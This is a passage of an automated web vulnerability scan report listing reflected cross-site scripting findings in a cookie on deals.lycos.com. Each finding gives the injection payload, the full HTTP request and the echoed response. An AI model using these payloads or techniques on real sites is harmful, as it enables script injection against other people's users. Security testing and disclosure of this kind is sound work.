c4:"deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e";alert(1)//2eff680c602"
});
</script>
...[SNIP]...

1.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6006c"><script>alert(1)</script>104c0231a35 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35&amp;cj=1" alt="tracker" />
...[SNIP]...

1.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e8f"%3balert(1)//4a914e95c2b was submitted in the diktfc cookie. This input was echoed as c2e8f";alert(1)//4a914e95c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f"%3balert(1)//4a914e95c2b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f";alert(1)//4a914e95c2b"
});
</script>
...[SNIP]...

1.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe5d1"><script>alert(1)</script>c619991de16 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16&amp;cj=1" alt="tracker" />
...[SNIP]...

1.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa24"><script>alert(1)</script>1fe7a425fe9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce470"%3balert(1)//88a1fe2d76c was submitted in the diktfc cookie. This input was echoed as ce470";alert(1)//88a1fe2d76c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470"%3balert(1)//88a1fe2d76c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470";alert(1)//88a1fe2d76c"
});
</script>
...[SNIP]...

1.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e7d6"%3balert(1)//c92b2a5a915 was submitted in the diktfc cookie. This input was echoed as 9e7d6";alert(1)//c92b2a5a915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6"%3balert(1)//c92b2a5a915; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6";alert(1)//c92b2a5a915"
});
</script>
...[SNIP]...

1.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56d7"><script>alert(1)</script>c863840866d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48163"><script>alert(1)</script>6916582d15c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/free-iphone-applications-413656&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f8d2"%3balert(1)//6cf56fb792b was submitted in the diktfc cookie. This input was echoed as 2f8d2";alert(1)//6cf56fb792b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2"%3balert(1)//6cf56fb792b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/free-iphone-applications-413656",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2";alert(1)//6cf56fb792b"
});
</script>
...[SNIP]...

1.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c4"><script>alert(1)</script>9c619f6f3d6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5635"%3balert(1)//0d3ef562288 was submitted in the diktfc cookie. This input was echoed as a5635";alert(1)//0d3ef562288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635"%3balert(1)//0d3ef562288; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17666

